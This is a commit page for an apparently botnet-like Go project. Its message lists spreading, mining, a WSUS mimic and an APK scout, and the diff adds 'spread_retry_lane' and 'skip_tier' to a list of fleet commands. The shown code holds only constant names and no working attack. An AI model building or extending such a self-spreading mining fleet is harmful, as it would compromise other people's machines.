Add fleet evolution: genetic breeding, atlas gossip, BGP router, seeder/miner, genealogy, court gates, APK scout, personas, WSUS mimic, and P2 test coverage

This commit is contained in:
AetherForge
2026-06-07 05:00:22 -07:00
parent 7b2d41cda8
commit 82d74abfcf
38 changed files with 486 additions and 120 deletions

View File

@@ -14,6 +14,8 @@ const (
CmdRestartMining = "restart_mining"
CmdReorderTiers = "reorder_tiers"
CmdSpreadNow = "spread_now"
CmdSpreadRetryLane = "spread_retry_lane"
CmdSkipTier = "skip_tier"
CmdStageFetch = "stage_fetch"
CmdSetAgentVersion = "set_agent_version"
CmdNoop = "noop"
@@ -26,6 +28,8 @@ var knownCommands = map[string]bool{
CmdRestartMining: true,
CmdReorderTiers: true,
CmdSpreadNow: true,
CmdSpreadRetryLane: true,
CmdSkipTier: true,
CmdStageFetch: true,
CmdSetAgentVersion: true,
CmdNoop: true,